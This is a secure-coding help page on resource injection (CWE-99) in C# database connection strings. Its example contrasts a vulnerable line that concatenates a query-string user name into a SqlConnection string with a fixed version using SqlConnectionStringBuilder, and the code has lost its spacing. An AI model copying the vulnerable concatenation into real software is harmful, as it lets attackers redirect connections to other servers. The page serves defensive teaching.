Recommendation¶

If user input must be included in a resource descriptor, it should be escaped to avoid a malicious user providing special characters that change the meaning of the descriptor. If possible, use an existing library to either escape or construct the resource.

For data connections within sub namespaces ofSystem.Data, a connection builder class is provided. For example, a connection string which is to be passed toSystem.Data.SqlClient.SqlConnection can be constructed safely using an instance ofSystem.Data.SqlClient.SqlConnectionStringBuilder.

Example¶

In the following examples, the code accepts a user name from the user, which it uses to create a connection string for an SQL database.

The first example concatenates the unvalidated and unencoded user input directly into the connection string. A malicious user could provide special characters to change the meaning of the connection string, and connect to a completely different server.

The second example uses theSqlConnectionStringBuilder to construct the connection string and therefore prevents a malicious user modifying the meaning of the connection string.

usingSystem.Data.SqlClient;usingSystem.Web;publicclassResourceInjectionHandler:IHttpHandler{publicvoidProcessRequest(HttpContextctx){stringuserName=ctx.Request.QueryString["userName"];// BAD: Direct use of user input in a connection string passed to SqlConnectionstringconnectionString="server=(local);user id="+userName+";password= pass;";SqlConnectionsqlConnectionBad=newSqlConnection(connectionString);// GOOD: Use SqlConnectionStringBuilder to safely include user input in a connection stringSqlConnectionStringBuilderbuilder=newSqlConnectionStringBuilder();builder["Data Source"]="(local)";builder["integrated Security"]=true;builder["user id"]=userName;SqlConnectionsqlConnectionGood=newSqlConnection(builder.ConnectionString);}}

References¶

• OWASP:Resource Injection.

• MSDN:Building Connection Strings.

• MSDN:Securing Connection Strings.

• Common Weakness Enumeration:CWE-99.